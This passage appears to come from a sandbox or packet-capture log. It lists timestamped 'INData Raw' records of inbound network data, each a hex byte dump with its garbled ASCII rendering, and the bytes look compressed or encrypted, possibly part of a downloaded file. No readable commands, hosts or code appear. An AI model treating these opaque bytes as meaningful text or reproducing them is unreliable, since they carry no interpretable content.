                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2921INData Raw: 8c 21 4a 99 f6 e4 72 76 db 04 35 94 57 17 3e 90 f0 e3 22 ed 7a ab 3c 01 0d 81 50 86 c1 b6 65 40 b4 23 b4 db 06 56 c8 d3 cf 4b 57 aa 77 f7 c2 aa e6 dc 99 bf 9f f7 3c 48 b9 3b 43 7e 6b 23 33 86 84 74 37 86 ed d8 bd f9 62 e1 28 6d 23 de 16 66 a3 e0 c6 3e f6 34 5b 22 78 8d 83 1c 91 39 c3 85 4e b7 f0 ea b1 50 87 a5 0e bf 9c e0 ac fb ef e9 f8 fd ec a2 fc 81 86 de a3 e9 f9 97 be a2 4a 37 18 3e a6 21 4d 3f 5d a9 2d 60 8e 19 01 d9 ed bb c4 7c d9 7a 85 01 9f b4 c5 16 e5 4c b8 6a c9 0d 00 8e 96 f1 5c 50 ab 01 6d 0c 08 2e 16 13 22 ec 4c 9c 0b 75 5c e6 b3 2a a4 df ba 11 54 26 ff a0 c3 9d f7 f7 91 3c d0 3d 9e 5f a2 bb 7c 6e 99 bc 6b 6a b6 67 bd 04 61 04 4c 20 1f e2 ca 26 15 12 c9 23 aa a7 be e3 1f 6a 71 c0 86 c8 cc 58 cd 9e 90 06 86 d8 6c e6 e3 02 20 8e e4 ef 9f 4a c0
                                                                                                                                                                                                    Data Ascii: !Jrv5W>"z<Pe@#VKWw<H;C~k#3t7b(m#f>4["x9NPJ7>!M?]-`|zLj\Pm."Lu\*T&<=_|nkjgaL &#jqXl J
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2937INData Raw: 19 ac af bb 50 bf 14 86 ef 0e 72 b7 57 ab b9 04 98 d9 ce d7 7c e4 06 a2 01 e7 de b6 77 30 d9 f7 24 1f 00 1f ee 9d c5 ab b2 1a e9 61 35 3a 1f 66 11 1f 62 d6 76 ad 56 29 71 f7 0a 1b 95 58 74 88 e7 6a 42 24 45 f4 23 84 a8 4e ae ab 7b 22 c3 20 9a a6 7c f9 1f 28 21 c3 9c 99 5b 25 11 02 8a 9b 93 be 7b ab cb 8e 0a 45 1e 4e 82 e1 cf 5f c6 e4 4a fb 70 c0 fb d4 7e ed 6a 06 89 eb 0a 59 e2 ee 24 cd 24 35 33 8f 07 c4 5b 74 5d f7 bb 4c 8c ea bb 72 07 b9 a2 56 6c 37 20 1d 9b 22 d6 a2 98 85 f0 5f 8b 60 16 da 66 66 28 da a5 e7 d9 62 f6 f7 0e 15 a3 d2 4e f1 78 67 9b c5 52 70 4c f3 0d 85 ff de 1c 1e 9d b6 a0 00 09 31 4f 05 de c0 23 bc 4f 8d 29 59 c8 12 12 83 25 0b ac 7c db ff 1b 08 c2 0e ba da b1 40 23 f5 c3 46 f4 41 fd 31 b3 6f 7e 8c f7 3a 88 cc a8 1e 16 7a 28 5a 30 ac 40
                                                                                                                                                                                                    Data Ascii: PrW|w0$a5:fbvV)qXtjB$E#N{" |(![%{EN_Jp~jY$$53[t]LrVl7 "_`ff(bNxgRpL1O#O)Y%|@#FA1o~:z(Z0@
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2953INData Raw: 42 92 76 fe 8c 45 69 d4 cf 2b 90 de 46 83 b2 d6 5e a0 14 45 b5 e4 26 b4 82 76 37 19 a2 74 a8 e9 5d f2 ce 6a 25 dd 28 49 14 7c e4 bc 6b a3 96 b8 a6 bc 16 a4 94 ef 04 f0 27 1e e5 62 4c f5 68 27 93 49 8b 09 11 2a 42 cf bf 67 1b 33 45 4d 68 05 a4 eb ef 6d 0b fd 25 81 73 85 e2 96 c2 75 85 f9 23 5d d3 ca 13 41 6e 71 83 db e7 11 dd 3e 27 f2 50 5c f6 31 1c 78 dd 8b 22 33 ff a2 af 86 69 7d 1a 38 e5 27 2e b5 7f 47 46 73 70 d3 a7 ee 4a e2 66 27 ea 29 51 f2 11 54 e4 5a 52 1e 1a 0a 20 fb 64 ba a3 bc 26 a2 04 47 1d 2b c6 02 b5 e5 c7 9e 58 0a 45 ce 5d 6b 8b 89 81 f6 cd 75 f2 4e 14 d9 4a b5 06 a4 da 35 80 11 52 9f 7e ea a8 bb 25 57 16 21 fc 79 83 e2 de c9 93 06 00 d9 40 8e 05 23 51 5d bb 12 7d 14 62 0e 70 52 34 a9 c5 63 6f e0 c6 ae da 19 c3 11 28 ba c3 7a a7 20 ea 53 35
                                                                                                                                                                                                    Data Ascii: BvEi+F^E&v7t]j%(I|k'bLh'I*Bg3EMhm%su#]Anq>'P\1x"3i}8'.GFspJf')QTZR d&G+XE]kuNJ5R~%W!y@#Q]}bpR4co(z S5
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2969INData Raw: 8a d3 27 fa 74 79 a4 28 92 1a d3 a7 6b 6f cf e8 a6 de 5b 7d e0 8c 77 69 0b b2 9b f7 e1 6e c5 12 e6 f9 50 d9 eb f2 52 24 91 de bc 16 08 a6 dc 3a 65 de 22 e6 f7 7c 59 48 b4 3a f6 1c 1d 19 a5 e5 a0 90 91 fe 31 09 a4 47 bd 00 b6 bc b4 00 0e 1d de fb f5 3c b1 26 2e 11 ca 99 e5 2e a9 34 85 66 b8 68 48 a9 50 0a 53 e5 9b be 02 e5 1f 0f 06 57 68 7f bf 61 28 0d 5d 0c 4e c4 70 a4 7f 6f c6 8c d2 3c 5d 9f 1e f1 96 6b d8 e7 9b c5 6a ca 37 10 ad 19 d9 e0 ea 7d 5d 7a a8 2a 26 4f f6 86 0c 9c 9d 3a 6a fe 2b 28 b4 41 c5 dc 5c 2a 2a bc 6d ee 85 4b 75 9c f1 44 20 08 13 d1 7e cd c6 9b 5d 4e 61 c1 ba 43 ff 12 4b 99 63 96 33 5d 34 ba a5 57 04 a6 2a ac 5d 31 61 bc 06 3a 22 db f2 7b 6c 48 c6 e0 82 ee 57 36 9f 9c 13 13 aa 77 01 52 f1 4f cb db 9e a6 a7 f7 4b f9 5e f0 33 f8 4c 3f 80
                                                                                                                                                                                                    Data Ascii: 'ty(ko[}winPR$:e"|YH:1G<&..4fhHPSWha(]Npo<]kj7}]z*&O:j+(A\**mKuD ~]NaCKc3]4W*]1a:"{lHW6wROK^3L?
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2985INData Raw: 20 7c 97 5d 76 16 fd 35 f4 d1 4f 45 b6 6b 80 f9 68 37 f1 ce 55 b6 c0 8f b2 4e 81 dc 53 3d 15 77 ac d6 cd 36 d9 3f 18 7e f8 63 f4 bf 4b d2 62 11 ab 8b 30 ea 10 f6 83 bf d6 0d d0 4f dc 67 08 1b 2d f0 51 12 74 ab 37 51 4d c9 9a 43 5b af 16 82 ca d0 ca 11 86 8b ae a1 5a eb d6 84 ae 28 71 d5 79 0d e1 bc 43 f2 72 02 51 b2 77 8f 80 bd 04 b2 23 0a 8b 95 43 7b 5e fb eb 37 e0 c4 0c 8d e9 f2 dc 2d d9 e6 27 f2 29 a6 40 90 e0 d0 e6 58 d2 bf 6e e4 74 7e dc 2a 11 60 be 77 62 5e 90 b0 4c ed 43 36 1f e9 54 b8 9c 19 b4 c5 b9 4c 8a 29 55 70 9d ff 12 ed 8a 69 63 b4 61 d8 48 fd e6 39 02 68 54 ac 0f 89 6b 69 e2 a4 58 c7 1e 8e fb 5a db af 54 06 43 15 9b 45 0c f2 1e 32 73 91 6f 21 fb a9 30 13 2c 5b 55 42 49 78 d6 a8 52 70 99 ed aa 75 1f 50 37 26 0f 14 fc 41 df 68 7a 76 25 3a 0a
                                                                                                                                                                                                    Data Ascii: |]v5OEkh7UNS=w6?~cKb0Og-Qt7QMC[Z(qyCrQw#C{^7-')@Xnt~*`wb^LC6TL)UpicaH9hTkiXZTCE2so!0,[UBIxRpuP7&Ahzv%:
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3001INData Raw: ed 6d a5 90 c9 62 f1 51 d3 b9 97 79 ec 64 af a9 e9 54 c6 61 4c be 51 83 b2 6b 8f 2e c6 80 ab de 19 9d 1d b6 55 bd c9 d0 5c a4 2d da af 71 73 53 f1 a9 b2 9e 6e 6e 44 1a 19 8b fb a7 ae 8f f4 82 9e ff 4f ac cb 27 6b 32 92 5c b0 aa 07 16 58 20 0f 40 54 eb 9b fa b2 19 1d a1 cb 53 77 3d a4 5d 5b bc 7f 40 e7 7b 65 c5 10 7e ee d2 b8 37 58 2d e0 f7 9f 64 96 79 de 67 45 d2 1e f7 01 68 6d b6 c2 55 09 cf 53 0f df 5b 96 84 55 d8 88 d2 02 9c b9 c5 53 fa d3 f2 f3 2f 13 3b 9e d1 4b 20 90 8a 6b 0a 3a 65 2e 6e 5a 97 bb b0 45 3e 71 39 80 fc ae b5 26 64 2e e7 4b eb 74 6f 37 35 64 8f 4b 34 92 07 d6 ff c4 aa 1b 5f 24 df 81 37 de 42 4f 1e d6 17 b3 a7 20 80 a8 11 df 53 1f 32 f6 33 e3 50 3a ab c7 7e 76 e1 15 ca c3 e3 50 20 15 09 dd 4c 7d cd a9 92 e3 63 50 a4 78 bf 14 ac b0 bf 50
                                                                                                                                                                                                    Data Ascii: mbQydTaLQk.U\-qsSnnDO'k2\X @TSw=][@{e~7X-dygEhmUS[US/;K k:e.nZE>q9&d.Kto75dK4_$7BO S23P:~vP L}cPxP
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3017INData Raw: ed 8c f1 3c 86 15 69 ff 08 de a8 6f d8 8d 5f 02 69 da 87 11 2e ab 23 00 89 bd c5 b0 1c a3 1b 6f fa dd cd ff b7 25 91 2e 36 e9 47 40 e4 73 82 20 03 ec 8a 21 00 90 13 f0 b6 60 17 8a 2d 86 ef d0 54 46 ff 62 33 5e 27 01 4a 4f ed a9 2d 8e 1e 47 c7 e4 fe 68 d6 25 23 ed 50 f5 9c ed 71 c8 bd 34 59 20 7b 09 db 41 60 03 ca 58 9d e1 49 99 9d 07 3c 0c ee 3f 35 12 ca 5c 3e 34 ad 03 09 5e 12 72 0a 7f e0 39 eb ca a3 45 f3 13 b6 38 3c 65 ee a3 05 b2 6e 5d ab 84 83 eb a4 e1 ac e8 48 be 93 87 ed 79 d4 e1 63 95 e6 95 2b fa 48 42 22 86 57 ef 21 9f f8 ff f3 eb 1c 8b 1e 16 ea 46 cf 36 7b 41 ce 53 ad 2a 15 80 d5 59 e4 5f 37 06 35 4c 86 22 b8 43 8f be 4f 4e a4 69 91 67 52 e0 d7 05 69 81 ee ca 0c f1 9a 0d 2c 84 5f a4 78 06 54 39 f0 17 8f ea d5 e8 c3 29 38 54 7e f4 19 39 05 68 1a
                                                                                                                                                                                                    Data Ascii: <io_i.#o%.6G@s !`-TFb3^'JO-Gh%#Pq4Y {A`XI<?5\>4^r9E8<en]Hyc+HB"W!F6{AS*Y_75L"CONigRi,_xT9)8T~9h
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3033INData Raw: 48 f1 be d7 b1 9e 85 3c f9 46 4e b7 6b 68 9a 0a ba d9 48 ea d7 06 d2 3a eb 66 6f 0f 41 36 7d b0 3b ed 82 e9 ae 9f 14 50 96 4c 68 e6 6f de 80 0f 09 67 0b d2 ee aa 40 2b a7 d6 27 b5 15 fb be 8c 3d a5 48 81 f3 80 40 d1 d6 bf a3 cd 4a b1 f7 5e 15 a8 1b 05 d2 05 d9 b9 17 d1 e9 01 36 77 8b 47 6a 80 28 05 9f 6f 9d e1 3f ff 25 28 4a cc c6 ff 32 8e b3 e2 0d bf 7f 62 c9 31 78 9e 90 71 d0 62 a7 38 6d 8a 52 aa 1c aa 99 06 45 0e 26 fa a8 75 05 8b 94 db 9b 15 1e e0 39 5b c0 79 8a 91 c0 45 4e 09 2f ad ad 09 7d d4 3b d4 c4 41 64 d1 0c a7 c4 08 fe e5 aa 8b f9 bd 73 e1 34 6a c0 72 98 d4 db db 47 d0 df b0 d2 40 85 a6 1d ff 07 8d 06 2f 20 52 33 36 37 fb c9 71 99 33 39 be b0 ea 84 b1 94 9f 21 14 36 fd 0b 52 f0 16 34 a6 eb e2 28 84 c8 2b 99 82 2a 69 3d 2d 91 cd 1f 66 7e 3a 1e
                                                                                                                                                                                                    Data Ascii: H<FNkhH:foA6};PLhog@+'=H@J^6wGj(o?%(J2b1xqb8mRE&u9[yEN/};Ads4jrG@/ R367q39!6R4(+*i=-f~:
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3049INData Raw: 38 25 cf 71 d9 84 85 90 3b b9 d9 d7 e7 cf b5 07 5a 95 66 20 30 56 0d 00 6b e1 21 b3 38 79 ae 8c 9e bd a5 26 98 07 37 12 a6 71 83 83 08 7f 2b db 3a 93 10 d2 6f 83 0c 3e c2 74 d0 37 00 ec 10 65 7b 25 b6 28 47 77 ef f6 c4 4d 0c 2c 71 00 ab 75 b1 71 e8 d8 ab 53 61 0b 99 7a 3e 51 e4 02 77 ed da 54 1e 50 39 4e 60 bd 06 f4 03 1c 98 96 c7 f3 b4 26 f3 62 00 51 8c ad b6 14 1f 28 23 c3 bd 16 1b b6 77 13 36 cb b1 18 01 fa f2 91 f8 23 f4 b9 4f d5 bb 01 a0 78 a1 0c 84 bc 14 36 f1 75 33 ff 16 99 aa fd e4 68 02 63 a0 de 0d e7 91 be de 0e 5f 0d 35 b2 83 9f ff 26 7d c8 de 19 d7 5b 14 bd e0 1a e4 00 d9 35 81 c9 7d b4 3c 46 49 89 39 78 7c dc f4 76 67 50 ad ed bc 58 04 d4 f6 2a 71 5d ee 44 45 d2 12 95 dd 36 d8 74 f1 6a a3 37 ef df 9c 29 c7 07 b2 eb 51 ba 55 5c e1 a4 bd d3 9b
                                                                                                                                                                                                    Data Ascii: 8%q;Zf 0Vk!8y&7q+:o>t7e{%(GwM,quqSaz>QwTP9N`&bQ(#w6#Ox6u3hc_5&}[5}<FI9x|vgPX*q]DE6tj7)QU\
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3065INData Raw: 6c 8d bd 1e 23 90 81 11 88 c5 1e 45 b3 ca 20 7e f3 28 e7 a5 21 1c 8b a9 0b 25 6e 1a 7a 1a 27 f1 bb 5b e9 29 1d f9 c4 3b 70 98 4f e5 48 46 ba 14 01 82 8d 1f f6 e4 1e 7d 41 da 44 92 a7 99 98 aa 17 20 5e 45 bc fe eb 0a c4 33 21 21 1b ba a7 4c 2c 61 96 7d 07 c0 bf 38 08 0f 93 69 f0 03 4c e3 61 c2 6a dc 17 44 c9 76 fb f9 3d d8 35 1c 94 74 f3 cb 54 64 b3 16 78 40 fe af 3d 61 31 ff d2 2b 56 51 fd 73 a8 a4 4a 8b 36 bb 7d b2 2f 07 e7 d4 45 f2 ae 44 fc c1 39 0f 50 9b bf c4 94 76 20 e8 c7 70 91 b7 f3 c3 42 33 3a d5 9d 32 64 7f 92 09 2d ff a3 f2 fb 8c 32 4d 31 b3 ca 7b 30 14 aa f8 d5 c9 95 c3 a4 18 31 64 d3 c0 8f 8d c6 83 83 88 bf e4 e7 ac 8b 0f cf a7 9e 2f bb d1 62 9b f8 3d f6 f2 e3 b1 ce 24 b1 0b 50 c8 7f 14 67 87 cd f7 3f 2a 53 df e6 1c f5 98 a9 4c d4 58 0c 95 34
                                                                                                                                                                                                    Data Ascii: l#E ~(!%nz'[);pOHF}AD ^E3!!L,a}8iLajDv=5tTdx@=a1+VQsJ6}/ED9Pv pB3:2d-2M1{01d/b=$Pg?*SLX4
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3081INData Raw: 4f 4b 96 1a 51 e3 ce e0 91 dd 37 cd fd 86 33 f0 bf cf ba ae 4f 16 ce 27 c1 e7 a8 e2 d6 f8 fb ed 9b f5 6f 8c d5 61 ab 45 0f ca 7d 70 69 29 2e 20 05 05 26 65 bf a1 9f 4d 42 cf 20 84 6e 25 73 52 2e 06 8f de 88 28 f7 26 0e 76 8e 4b c9 a8 e0 56 fe e2 e5 6b 7b 13 6d 41 d6 ce 6d 41 78 e0 88 65 15 47 c1 31 92 87 4e 94 3a b9 af 80 df 24 3d 53 c9 f6 88 e6 12 21 4c ce c9 61 17 df 61 8e fd 65 c6 14 66 f9 6f 03 36 72 18 3f eb a2 e6 cc c4 68 7c 4b 96 34 b9 c0 87 b2 a2 73 88 8e fe 34 a5 2a 31 8b 17 74 0d 24 b5 90 6e 6b 57 02 51 14 f4 ce 23 b0 b0 9b c8 11 d1 64 05 17 51 58 85 03 cf 49 23 9c 88 37 90 76 f4 5b 66 18 2a 7c f7 bc 38 f1 63 20 fe 60 06 8f 5e ae 9e ff 1e 9e cf 48 95 f7 37 f6 ad bc c9 38 11 3a c5 40 bf 50 e9 1e 40 b7 28 3a 7c cb 2c 46 6d f7 6b cc af af 81 3f 4c
                                                                                                                                                                                                    Data Ascii: OKQ73O'oaE}pi). &eMB n%sR.(&vKVk{mAmAxeG1N:$=S!Laaefo6r?h|K4s4*1t$nkWQ#dQXI#7v[f*|8c `^H78:@P@(:|,Fmk?L
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3097INData Raw: 37 7f 10 2d 7e b8 df 16 79 47 9e 37 59 79 a0 ef ff 73 78 7f 61 49 71 09 83 a8 5a 38 1e 3d 41 d7 8c 6f 17 6a 78 b5 3f 31 fe fd be bd a2 36 13 fc 42 56 c3 3d a5 70 1b 20 28 7c e0 40 a3 71 66 be 4c 38 d3 b5 65 7c cf 86 43 8c b8 0d 7b e8 19 88 02 0a d4 16 56 c9 7e 94 05 e8 ec 8f 4c b9 e8 2b d2 08 6e a6 07 25 55 a4 97 c0 7b ba aa 3f 13 0b 3a 31 fe 2d 4c 3b ff 5a 95 41 ed 97 3c 6e 25 1b 6f ed e1 8d aa 73 e1 c7 76 a7 9e f6 e3 52 94 2b ec 34 45 a4 ac 1a 04 4d e2 ec 0e f4 de dc 5f 38 9f 4a 57 f6 5e 3a 7a 10 92 2a 4e 97 b8 8d 8a 0b 91 14 c7 35 b0 96 23 20 8e 5b 17 1b 72 69 48 09 6c 98 37 16 a3 f1 f6 41 33 42 d6 17 a7 29 33 c6 2f ce 97 52 52 e4 a5 ef 38 9d 09 aa 32 b6 23 0d 09 e2 16 bb f8 3a a2 57 8b b2 f0 5a e3 13 48 60 38 56 13 33 a4 db 20 5b 5b de 2a 0a f1 0d 61
                                                                                                                                                                                                    Data Ascii: 7-~yG7YysxaIqZ8=Aojx?16BV=p (|@qfL8e|C{V~L+n%U{?:1-L;ZA<n%osvR+4EM_8JW^:z*N5# [riHl7A3B)3/RR82#:WZH`8V3 [[*a
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3113INData Raw: 6a 30 f6 95 fc 8c 68 64 1a ad d2 9c b7 7c 6a c7 7a c4 10 2c c6 54 9e 30 02 0c 4b 17 98 8a 2a 3c 44 72 3d 93 f9 a8 f5 6d d5 20 33 c0 53 ac 4e 15 2e 02 63 da 04 88 f3 38 4f 36 74 97 28 fe 78 18 16 58 27 2d 7c 41 b1 92 a3 fe 17 ef 88 2e 34 05 ba 59 05 60 8e 53 a8 0d 54 73 9e e8 0e cc 8c 07 63 e3 6d bd 79 6c c2 26 2f 44 b6 d0 cb 05 9c ec d6 81 1a 6b dd 49 53 13 f0 7b 32 90 e2 64 e0 e7 df fa 6f 28 d6 10 f3 5d 06 1d 44 5a 5c c0 f1 a0 3f 3f d4 2a de bb 68 ed ec 36 55 1b d6 c4 fe 8b 72 59 9b 54 69 a2 d7 4c 16 c0 31 8a 20 27 f5 75 94 96 a4 5b 3c 91 86 88 a5 3d 70 dc 72 ab 97 b9 ad 67 aa c8 ae 40 bf 2f 73 65 f9 24 69 90 24 f8 aa 8e 1d e0 b6 1f c7 40 21 0c 19 56 e5 00 98 c7 22 bb 02 4d 81 85 1e 78 e2 56 66 2b 3c 8a 49 e5 c6 39 3e 79 fb e4 64 76 09 a5 63 7d 39 1f c2
                                                                                                                                                                                                    Data Ascii: j0hd|jz,T0K*<Dr=m 3SN.c8O6t(xX'-|A.4Y`STscmyl&/DkIS{2do(]DZ\??*h6UrYTiL1 'u[<=prg@/se$i$@!V"MxVf+<I9>ydvc}9
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3129INData Raw: e3 31 ef e3 5b 8d c7 0a c1 95 da b3 3f 7c 09 47 19 d5 06 e3 c3 a9 5d b5 9c 92 47 23 52 87 43 24 0f 76 e4 e8 de 32 6f 40 7a 0a f8 b0 8b 8e 7a 94 bd 44 b5 30 ae 3e 24 4d f5 90 13 a3 b4 96 65 83 d7 1e 42 0a ff dd c2 a0 bb 16 78 53 26 d8 16 02 43 e3 7e 9f 29 2f 44 f2 93 8e 2f 1d 6e b8 d6 68 d1 aa 73 31 f9 45 2c 14 84 9f 23 43 84 92 97 2c f6 a6 7c ce 86 51 29 f4 cf 8c 64 bb 72 64 a4 20 2c 08 bd 69 e5 e1 ce fc c6 c1 88 23 a2 cb 50 a7 31 63 e6 db 9e cc e1 ab c7 16 3d 4a 3f fd a6 fe d9 2f 4f 8d 84 8c 69 eb 24 e1 f3 6f 5e 6f 6c a6 28 eb 57 99 af 19 5c d5 54 26 c6 8e db 71 ac fe f4 d0 7f c7 70 5b d2 4d 95 6d ba 7a e8 ec 0e 1c fb 23 01 8a a0 58 40 56 e5 fe 24 4f 4f 9c e2 1f ff a6 a9 9d 2d 70 ac 69 ef 7b a1 fc 0c c6 e8 68 57 28 91 6a 23 86 2a 10 ce 83 10 9e 9d 71 a3
                                                                                                                                                                                                    Data Ascii: 1[?|G]G#RC$v2o@zzD0>$MeBxS&C~)/D/nhs1E,#C,|Q)drd ,i#P1c=J?/Oi$o^ol(W\T&qp[Mmz#X@V$OO-pi{hW(j#*q
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3145INData Raw: 34 62 52 d0 50 1e 3c c7 6a 58 6b ca ca 23 cd c8 10 3f de 64 37 16 a4 31 4c 7b 2b dc e3 a8 84 22 13 ea a7 d2 03 9b 44 8a f6 4b 70 ea 6d 3e 19 57 3f f5 53 f0 d1 07 a2 49 ad 48 5f 57 72 08 bf f7 2e 64 dc 88 8e 7d ab b3 76 42 5d b7 0a b8 87 da 6a e7 e7 4c f8 fa f1 4b f9 bc 7a 3d 80 fd ec 18 5d 0e d1 32 ca 73 f8 c9 01 b1 fb 03 19 0b 08 a7 e6 ab c5 1b d2 87 b8 d5 9d 8e 31 af cd a6 8b 1c f7 a2 d5 d9 f2 e3 e5 8c 4c 5e eb 99 fd ab 61 2e ad e6 5e 70 99 46 bf 4c 04 26 da 4a 7f e8 1a 37 22 26 3c 85 f7 b4 aa cb ff a6 12 fd 7c 5a cf 3a 8a 0e 6e 1f e4 d7 8d bf 96 f4 b4 45 8a 87 ea 7d 0b 47 dd 7b e1 30 73 78 de a1 19 ae 91 72 09 8a dc 6e c0 ab e7 c3 0d 35 3c 72 5a af b3 60 26 62 81 8b 03 e4 9b c0 a0 e4 5a 93 ac 90 7c 34 9c d1 79 c2 ef 94 a1 47 0b a7 63 ec fd b5 aa aa 48
                                                                                                                                                                                                    Data Ascii: 4bRP<jXk#?d71L{+"DKpm>W?SIH_Wr.d}vB]jLKz=]2s1L^a.^pFL&J7"&<|Z:nE}G{0sxrn5<rZ`&bZ|4yGcH
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3161INData Raw: 95 6a 36 f9 f2 de f3 72 eb 7c 0b b0 84 16 f2 48 cd 49 8b 73 0c 3f b3 e9 bd cc 3f 45 16 b9 5e 79 aa 28 f8 2f 96 68 81 de 91 9a ba 3b 68 fc f5 b1 f6 ac 52 7e 99 6b 8d 6c d7 9b 5e fd a0 aa 88 69 60 c0 7b 92 1f 8d 9b a9 3c b9 e4 2d 28 d9 f5 c8 cf c1 64 47 e0 9b 1f 05 19 5e dd 5c 19 13 fb 90 fa 3b 5d f6 19 d4 b3 9f ae 16 6b c8 82 48 0d dc f1 02 5d 9f 81 bf 81 74 15 e8 df ac b5 e0 05 8a 72 08 4e 9a 49 a5 ad 20 30 ad 6d 35 04 b5 a4 31 89 2b 7b 4b 8b 43 f7 1c 03 80 0e 2a bc 34 e0 76 f9 3f 9f eb 64 d3 f1 88 df c8 7d 46 fb 25 f0 b0 bb 9a 7a 88 44 07 cb b9 b1 1f cf c4 4c 0a ab 63 e0 97 e0 5c 62 02 b3 3f 4f 5f 68 b7 6a d1 b6 2b 50 41 26 14 cd 0a 9d b5 89 fd 3b 01 a9 38 dc 7b b5 e7 27 03 e6 42 e9 7f c0 2a 86 dd e1 86 44 db 14 78 37 f8 60 64 d4 f3 83 a2 5c f8 04 de f6
                                                                                                                                                                                                    Data Ascii: j6r|HIs??E^y(/h;hR~kl^i`{<-(dG^\;]kH]trNI 0m51+{KC*4v?d}F%zDLc\b?O_hj+PA&;8{'B*Dx7`d\
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3177INData Raw: 95 d7 63 43 7b f0 f4 4b 68 ce 11 df ce 9a 04 25 0a 35 dc 34 e5 24 47 ca 48 77 22 8a 2c 5a cb 54 72 c0 d4 5b c8 ac 3d b0 a7 5b 02 80 f0 79 53 a5 e0 c7 69 28 8e f8 32 bf c9 04 77 d6 68 34 bf 95 74 30 df 79 e8 37 a0 0e 0b d3 0a c8 bd 61 75 ca 83 52 c6 41 da 04 78 fd b5 2a 1e e8 02 68 e3 36 ff 71 ad fe af e8 c8 80 de f4 d3 46 d8 d7 80 7a 90 82 e7 0f ea 67 0b 37 34 91 24 95 06 0f b6 92 c8 e7 aa bd 8c bf 67 f5 2e 33 cb 39 2f d0 51 7d ff 27 8e ed 77 5c 78 e6 f2 f7 4e 35 10 bd 58 a2 4a 73 c5 9c 4d 92 f5 04 af 86 58 31 7f d7 9b 39 10 1f 19 ed 0e 59 d1 ff f0 75 40 e4 fd 3a e4 b0 35 bd d1 50 ed f3 75 4a 1c 61 0c c8 78 3e 79 e7 d9 b7 ea 07 a4 4a ca 02 ad a0 79 5e 2a 98 b1 cf b4 64 19 29 8a 07 94 b5 24 df 42 14 07 91 ba 4e 11 01 8e 09 27 3a 35 f0 93 a6 60 55 ee d3 81
                                                                                                                                                                                                    Data Ascii: cC{Kh%54$GHw",ZTr[=[ySi(2wh4t0y7auRAx*h6qFzg74$g.39/Q}'w\xN5XJsMX19Yu@:5PuJax>yJy^*d)$BN':5`U
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3193INData Raw: 34 21 58 c2 1a 52 a4 cd 0f 08 fb 53 3f 8c 6f 92 66 33 96 6e 63 d8 a4 ea 4e 9e 56 41 24 59 12 46 75 6d 38 b6 31 07 f4 ea 86 4c 67 f9 d0 0a c0 8b 7c 40 e8 03 6c 93 ad d7 8c c8 d9 95 04 92 d2 f7 42 21 2a 30 6d a8 04 eb d9 7d 73 87 70 73 5d f4 38 7d 04 2a bc dc 19 4e 16 50 81 77 62 8c e5 7d d7 44 98 eb cc b3 49 84 d0 38 1c 98 bc e4 1c 03 b7 44 f8 5f 95 ed bc ea 62 9c f4 14 2e 4d cc b3 6b 5c 38 1c 1d 33 59 28 e6 c2 12 a4 d3 a8 3d f6 54 0e d3 16 94 2a 8e f3 25 9b ba 3f 92 57 a8 62 62 a8 a7 92 24 b1 e1 6e da 34 14 75 1a 29 4e 5a 15 e5 8e fa 6e d1 51 33 97 95 c8 64 48 44 41 05 a5 23 78 8a 6f 0a 86 5f 37 43 04 ac e0 2a cf 4c 2f d3 6b 3a 34 23 64 b0 78 a0 a2 8a 9a d1 f9 db 1f 9a 47 72 69 81 23 75 db e5 30 9b 4d 16 21 b4 16 f5 d0 1b 1f b3 1e a7 94 ff 17 f4 07 53 5d
                                                                                                                                                                                                    Data Ascii: 4!XRS?of3ncNVA$YFum81Lg|@lB!*0m}sps]8}*NPwb}DI8D_b.Mk\83Y(=T*%?Wbb$n4u)NZnQ3dHDA#xo_7C*L/k:4#dxGri#u0M!S]
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3209INData Raw: 2c 2c b0 2a 6b 97 de 5b 27 0e 69 22 c4 a1 5b 87 b0 68 46 fd 7e a1 ba ba 4f f1 7b dc 70 34 ba b4 f1 ea fd 00 7b 3c ed 5f 8f 25 db 65 85 5a 4f 54 9b e7 ff 2a a7 e2 16 9e 16 96 d6 09 45 ab 5d d5 4e b7 37 c9 13 1e 42 96 94 7c 76 f2 e9 ad cd 7a 9c 9a d1 6f 7d b2 74 e2 a0 2d 2d 91 93 3c f8 34 68 02 33 d6 f8 ee 98 6f d7 26 aa 7c 82 75 68 e8 32 69 6d a1 d4 fa c8 89 ee 2e ba 4b 51 b1 05 aa 5e 73 48 2b b9 25 cf db da f0 4c 78 9c 9a 73 a0 da 74 9e 70 de 76 73 a7 20 39 1c ac a9 1b cd 45 4b e6 0e ad e3 c6 e4 63 3e 6f ba 04 96 c0 6f e8 73 21 4c e7 2a e7 ee fa 31 06 7d 47 9c 37 b1 88 98 fe 51 f2 1c 59 fc 02 c0 98 ef 24 10 d3 f2 31 45 b5 81 21 05 86 9f 68 a4 35 7c 88 95 02 fe a2 f1 57 90 60 6b d4 c5 6e f8 78 5a d3 49 4e cf d3 08 51 83 04 96 42 f5 dd 57 d8 ce b4 3f a2 32
                                                                                                                                                                                                    Data Ascii: ,,*k['i"[hF~O{p4{<_%eZOT*E]N7B|vzo}t--<4h3o&|uh2im.KQ^sH+%Lxstpvs 9EKc>oos!L*1}G7QY$1E!h5|W`knxZINQBW?2
